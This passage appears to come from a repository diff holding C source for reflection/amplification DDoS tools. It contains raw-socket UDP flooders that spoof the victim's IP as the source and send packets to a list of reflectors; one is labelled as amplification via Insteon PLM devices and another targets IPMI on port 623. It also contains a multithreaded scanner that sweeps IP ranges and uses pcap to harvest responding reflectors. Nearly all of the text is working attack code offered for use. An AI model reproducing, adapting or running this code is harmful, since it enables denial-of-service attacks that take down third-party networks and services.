strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,230 @@
|
|||
/*
|
||||
private amplification
|
||||
insteon plm devices.
|
||||
|
||||
Transmissional.
|
||||
*/
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
/*
|
||||
let us define container sets.
|
||||
we could use this to initialise more data response.
|
||||
*/
|
||||
|
||||
#define get_response 0x002
|
||||
#define meta_iso_req 0x00FFFF
|
||||
#define mobset_rw_se 0x000000000
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 2; /* we set the payload length as an individual integer as sizeof() is NOT reliable */
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100"); /* jason this wasn't necessary yano */
|
||||
}
|
||||
#define get_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"
|
||||
#define net_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"
|
||||
void setup_udp_header(struct udphdr *udph) // setup our little cutie
|
||||
{
|
||||
/* we are establishing a full form connection to
|
||||
snmp. this should force release a get response
|
||||
which should include device data and traffic_D.
|
||||
response should be 1000+
|
||||
*/
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(9761);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x02\x60", 2);
|
||||
udph->len=htons(sizeof(struct udphdr) + 2);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n"); // errors
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026); // <-- you should try to play around with this
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); // errors
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,208 @@
|
|||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 23;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(623);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x06\x00\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x20\x18\xc8\x81\x00\x38\x8e\x04\xb5", 23);
|
||||
udph->len=htons(sizeof(struct udphdr) + 23);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 23;
|
||||
static unsigned int xport = 623;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x06\x00\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x20\x18\xc8\x81\x00\x38\x8e\x04\xb5", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,187 @@
|
|||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
